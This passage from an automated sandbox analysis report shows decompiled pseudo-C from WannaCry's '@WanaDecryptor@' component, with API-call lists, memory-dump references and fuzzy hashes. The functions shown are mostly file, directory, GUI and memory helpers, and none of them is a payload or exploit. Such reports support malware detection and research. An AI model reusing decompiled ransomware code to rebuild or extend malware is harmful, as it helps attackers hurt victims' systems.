                                  								 *_t46 = 0;
                                  								 *(_t46 + 1) = 1;
                                  								 *((char*)(_t46 + 0x10)) = 0;
                                  								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
                                  								 *(_t46 + 0xc) = 0;
                                  								 *_a16 = 0;
                                  								return _t46;
                                  							}
                                  						} else {
                                  							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                  							if(_t44 != 0xffffffff) {
                                  								_a12 = 1;
                                  								L10:
                                  								_t28 = SetFilePointer(_t44, 0, 0, 1);
                                  								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
                                  								goto L11;
                                  							} else {
                                  								 *_t45 = 0x200;
                                  								return 0;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					 *_a16 = 0x10000;
                                  					return 0;
                                  				}
                                  			}










                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                  • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Pointer$#823Create
                                  • String ID:
                                  • API String ID: 3407337251-0
                                  • Opcode ID: 60c44a9ea6338bdef0f7b00b9d617ba4f076ca8c1f1597f154903f254465afcb
                                  • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                  • Opcode Fuzzy Hash: 60c44a9ea6338bdef0f7b00b9d617ba4f076ca8c1f1597f154903f254465afcb
                                  • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00412250(CHAR* _a4, void* _a8) {
                                  				void _v260;
                                  				char _v520;
                                  				long _t16;
                                  				void* _t17;
                                  				void* _t29;
                                  				CHAR* _t32;
                                  				signed int _t33;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				signed int _t39;
                                  				unsigned int _t46;
                                  				signed int _t47;
                                  				signed int _t51;
                                  				signed int _t52;
                                  				void* _t56;
                                  				void* _t83;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t87;
                                  				char* _t88;
                                  				char* _t93;
                                  
                                  				_t88 =  &_v520;
                                  				_t32 = _a4;
                                  				if(_t32 != 0) {
                                  					_t16 = GetFileAttributesA(_t32);
                                  					if(_t16 == 0xffffffff) {
                                  						_t16 = CreateDirectoryA(_t32, 0);
                                  					}
                                  				}
                                  				_t87 = _a8;
                                  				_t34 =  *_t87;
                                  				if(_t34 == 0) {
                                  					L15:
                                  					return _t16;
                                  				} else {
                                  					_t17 = _t87;
                                  					_t56 = _t87;
                                  					do {
                                  						if(_t34 == 0x2f || _t34 == 0x5c) {
                                  							_t17 = _t56;
                                  						}
                                  						_t34 =  *(_t56 + 1);
                                  						_t56 = _t56 + 1;
                                  					} while (_t34 != 0);
                                  					if(_t17 != _t87) {
                                  						_t86 = _t87;
                                  						_t51 = _t17 - _t87;
                                  						_t52 = _t51 >> 2;
                                  						memcpy( &_v260, _t86, _t52 << 2);
                                  						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
                                  						_t93 =  &(_t88[0x18]);
                                  						_t34 = 0;
                                  						_t93[_t29 + 0x114] = 0;
                                  						E00412250(_t32,  &_v260);
                                  						_t88 =  &(_t93[8]);
                                  					}
                                  					_v520 = 0;
                                  					if(_t32 != 0) {
                                  						asm("repne scasb");
                                  						_t46 =  !(_t34 | 0xffffffff);
                                  						_t85 = _t32 - _t46;
                                  						_t47 = _t46 >> 2;
                                  						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
                                  						_t88 =  &(_t88[0x18]);
                                  						_t34 = 0;
                                  					}
                                  					asm("repne scasb");
                                  					_t36 =  !(_t34 | 0xffffffff);
                                  					_t83 = _t87 - _t36;
                                  					_t33 = _t36;
                                  					asm("repne scasb");
                                  					_t39 = _t33 >> 2;
                                  					memcpy( &_v520 - 1, _t83, _t39 << 2);
                                  					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
                                  					_t16 = GetFileAttributesA( &_v520);
                                  					if(_t16 != 0xffffffff) {
                                  						goto L15;
                                  					} else {
                                  						return CreateDirectoryA( &_v520, 0);
                                  					}
                                  				}
                                  			}

























                                  APIs
                                  • GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesCreateDirectoryFile
                                  • String ID:
                                  • API String ID: 3401506121-0
                                  • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                  • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
                                  				void* _t15;
                                  				signed int _t23;
                                  				intOrPtr* _t33;
                                  				void* _t34;
                                  
                                  				_t23 = _a12;
                                  				_t33 = _a4;
                                  				_push(_t23);
                                  				_push(_a8);
                                  				_t34 = __ecx;
                                  				_push(_t33);
                                  				L00412D6A();
                                  				if(_t23 > 6) {
                                  					L12:
                                  					return _t15;
                                  				} else {
                                  					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
                                  						case 0:
                                  							_push( *((intOrPtr*)(__ecx + 0x824)));
                                  							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
                                  							L00412D64();
                                  							if(_t17 == 0x402) {
                                  								L6:
                                  								_push(0xe0e0);
                                  								 *((intOrPtr*)( *_t33 + 0x38))();
                                  							} else {
                                  								L00412D64();
                                  								if(_t17 == 0x3fe) {
                                  									goto L6;
                                  								} else {
                                  									L00412D64();
                                  									if(_t17 == 0x3fb) {
                                  										goto L6;
                                  									} else {
                                  										_push(0xffffff);
                                  										 *((intOrPtr*)( *_t33 + 0x38))();
                                  									}
                                  								}
                                  							}
                                  							_t35 =  *((intOrPtr*)(_t34 + 0x828));
                                  							if(_t35 != 0) {
                                  								goto L11;
                                  							}
                                  							return 0;
                                  							goto L13;
                                  						case 1:
                                  							goto L12;
                                  						case 2:
                                  							_push( *((intOrPtr*)(__esi + 0x824)));
                                  							__ecx = __edi;
                                  							 *((intOrPtr*)( *__edi + 0x34))();
                                  							if(__esi != 0) {
                                  								L11:
                                  								return  *((intOrPtr*)(_t35 + 4));
                                  							}
                                  							return 0;
                                  							goto L13;
                                  					}
                                  				}
                                  				L13:
                                  			}








                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3089$#4476
                                  • String ID:
                                  • API String ID: 2870283385-0
                                  • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                  • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
                                  				char _v500;
                                  				signed int _t22;
                                  				signed int _t27;
                                  				intOrPtr* _t32;
                                  				void* _t40;
                                  				void* _t43;
                                  				void* _t44;
                                  				void* _t45;
                                  				void* _t46;
                                  				void* _t49;
                                  
                                  				_t32 = __ecx;
                                  				_push(0);
                                  				L0041303E();
                                  				srand(__eax);
                                  				_t49 =  &_v500 + 8;
                                  				_t22 = rand();
                                  				asm("cdq");
                                  				_t40 = 0;
                                  				_t43 = _t22 % 0xc8 + 0x1f;
                                  				if(_t43 <= 0) {
                                  					L2:
                                  					_t41 = _t49 + _t43 - 0x13;
                                  					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
                                  					_t44 = _t43 + 1;
                                  					 *((char*)(_t49 + _t44 + 0x14)) = 0;
                                  					_t45 = _t44 + 1;
                                  					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
                                  					_t46 = _t45 + 1;
                                  					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
                                  					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
                                  					if(_t27 >= 0) {
                                  						E0040D5A0(_t32, _t41);
                                  						return 0;
                                  					} else {
                                  						return _t27 | 0xffffffff;
                                  					}
                                  				} else {
                                  					goto L1;
                                  				}
                                  				do {
                                  					L1:
                                  					 *((char*)(_t49 + _t40 + 0xc)) = rand();
                                  					_t40 = _t40 + 1;
                                  				} while (_t40 < _t43);
                                  				goto L2;
                                  			}














                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                  • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00405180(void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t10;
                                  				intOrPtr _t19;
                                  				void* _t26;
                                  
                                  				_t19 = _a4;
                                  				_t26 = __ecx;
                                  				_t10 =  *((intOrPtr*)(__ecx + 0x44));
                                  				__imp___mbscmp(_t10, _t19);
                                  				if(_t10 == 0) {
                                  					return _t10;
                                  				} else {
                                  					_push(_t19);
                                  					L00412DA0();
                                  					 *((char*)(__ecx + 0x48)) = 1;
                                  					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
                                  						E00405800(__ecx, 0);
                                  					}
                                  					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
                                  						E00405820(_t26, 0);
                                  					}
                                  					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
                                  						return InvalidateRect( *(_t26 + 0x20), 0, 1);
                                  					}
                                  					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
                                  				}
                                  			}







                                  APIs
                                  • _mbscmp.MSVCRT ref: 00405191
                                  • #860.MFC42(?), ref: 004051A1
                                  • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                  • String ID:
                                  • API String ID: 497622568-0
                                  • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                  • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00412A00(intOrPtr* _a4) {
                                  				intOrPtr _t8;
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t14;
                                  				intOrPtr _t16;
                                  				void* _t18;
                                  
                                  				_t14 = _a4;
                                  				if(_t14 != 0) {
                                  					if( *_t14 == 1) {
                                  						_t2 = _t14 + 4; // 0x5d5e5f01
                                  						_t16 =  *_t2;
                                  						 *0x4220dc = E004127A0(_t16);
                                  						if(_t16 != 0) {
                                  							_t9 =  *((intOrPtr*)(_t16 + 0x138));
                                  							if(_t9 != 0) {
                                  								_push(_t9);
                                  								L00412C98();
                                  								_t18 = _t18 + 4;
                                  							}
                                  							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
                                  							 *((intOrPtr*)(_t16 + 0x138)) = 0;
                                  							if(_t10 != 0) {
                                  								_push(_t10);
                                  								L00412C98();
                                  								_t18 = _t18 + 4;
                                  							}
                                  							_push(_t16);
                                  							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
                                  							L00412C98();
                                  							_t18 = _t18 + 4;
                                  						}
                                  						_push(_t14);
                                  						L00412C98();
                                  						_t8 =  *0x4220dc; // 0x0
                                  						return _t8;
                                  					} else {
                                  						 *0x4220dc = 0x80000;
                                  						return 0x80000;
                                  					}
                                  				} else {
                                  					 *0x4220dc = 0x10000;
                                  					return 0x10000;
                                  				}
                                  			}










                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7d7a2d2ee013bc337beabdbd42578881703ff57a30ad9c0a94d6315e8ea3cb2
                                  • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                  • Opcode Fuzzy Hash: e7d7a2d2ee013bc337beabdbd42578881703ff57a30ad9c0a94d6315e8ea3cb2
                                  • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00404430(intOrPtr __ecx, char _a8) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr _t13;
                                  				struct HICON__* _t16;
                                  				struct HICON__* _t17;
                                  				intOrPtr _t26;
                                  
                                  				_t26 = __ecx;
                                  				_t13 =  *((intOrPtr*)(__ecx + 0x59));
                                  				if(_t13 != 0) {
                                  					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                  						E00404530(__ecx);
                                  					}
                                  					if(E004045E0(_t26,  &_a8) == 0) {
                                  						_t16 =  *(_t26 + 0x60);
                                  					} else {
                                  						_t16 =  *(_t26 + 0x5c);
                                  					}
                                  					_t17 = SetCursor(_t16);
                                  					L00412CBC();
                                  					return _t17;
                                  				} else {
                                  					_v16 = 0x10;
                                  					if(__ecx != 0) {
                                  						_t13 =  *((intOrPtr*)(__ecx + 0x20));
                                  						_v8 = _t13;
                                  					} else {
                                  						_v8 = __ecx;
                                  					}
                                  					_v12 = 2;
                                  					__imp___TrackMouseEvent( &_v16);
                                  					 *((char*)(_t26 + 0x59)) = 1;
                                  					L00412CBC();
                                  					return _t13;
                                  				}
                                  			}











                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$CursorEventMouseTrack
                                  • String ID:
                                  • API String ID: 2186836335-0
                                  • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                  • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00404CF0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t13;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t27;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041384E);
                                  				_t13 =  *[fs:0x0];
                                  				_push(_t13);
                                  				 *[fs:0x0] = _t27;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t21 = __ecx + 0x70;
                                  				_v16 = _t21;
                                  				 *_t21 = 0x415c00;
                                  				_v4 = 3;
                                  				L00412D52();
                                  				 *_t21 = 0x415bec;
                                  				_t22 = __ecx + 0x64;
                                  				_v16 = _t22;
                                  				 *_t22 = 0x415c00;
                                  				_v4 = 4;
                                  				L00412D52();
                                  				 *_t22 = 0x415bec;
                                  				_v4 = 0;
                                  				L00412CC2();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t13;
                                  			}












                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                  • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                  • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#641#800
                                  • String ID:
                                  • API String ID: 2580907805-0
                                  • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                  • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00404170(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t12;
                                  				intOrPtr* _t20;
                                  				intOrPtr _t25;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413776);
                                  				_t12 =  *[fs:0x0];
                                  				_push(_t12);
                                  				 *[fs:0x0] = _t25;
                                  				_v20 = __ecx;
                                  				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                  				_v4 = 0;
                                  				_t20 = __ecx + 0x48;
                                  				_v16 = _t20;
                                  				 *_t20 = 0x415c00;
                                  				_v4 = 3;
                                  				L00412D52();
                                  				 *_t20 = 0x415bec;
                                  				_v4 = 1;
                                  				L00412CC2();
                                  				_v4 = 0;
                                  				L00412CC2();
                                  				_v4 = 0xffffffff;
                                  				L00412D94();
                                  				 *[fs:0x0] = _v12;
                                  				return _t12;
                                  			}











                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                  • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#2414#795
                                  • String ID:
                                  • API String ID: 932896513-0
                                  • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                  • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
                                  				intOrPtr* _t18;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t30;
                                  				intOrPtr* _t35;
                                  				intOrPtr* _t37;
                                  				void* _t40;
                                  
                                  				_t1 =  &_a12; // 0x40276a
                                  				_t35 = _a8;
                                  				if(_t35 ==  *_t1) {
                                  					_t16 =  &_a4; // 0x40276a
                                  					_t18 =  *_t16;
                                  					 *_t18 = _t35;
                                  					return _t18;
                                  				} else {
                                  					do {
                                  						_t37 = _t35;
                                  						_t35 =  *_t35;
                                  						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
                                  						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
                                  						_t30 =  *((intOrPtr*)(_t37 + 0xc));
                                  						if(_t30 != 0) {
                                  							_t23 =  *((intOrPtr*)(_t30 - 1));
                                  							if(_t23 == 0 || _t23 == 0xff) {
                                  								_push(_t30 + 0xfffffffe);
                                  								L00412C98();
                                  								_t40 = _t40 + 4;
                                  							} else {
                                  								 *((char*)(_t30 - 1)) = _t23 - 1;
                                  							}
                                  						}
                                  						_push(_t37);
                                  						 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                  						 *((intOrPtr*)(_t37 + 0x10)) = 0;
                                  						 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                  						L00412C98();
                                  						_t40 = _t40 + 4;
                                  						_a8 = _a8 - 1;
                                  					} while (_t35 != _a12);
                                  					_t22 = _a4;
                                  					 *_t22 = _t35;
                                  					return _t22;
                                  				}
                                  			}











                                  APIs
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
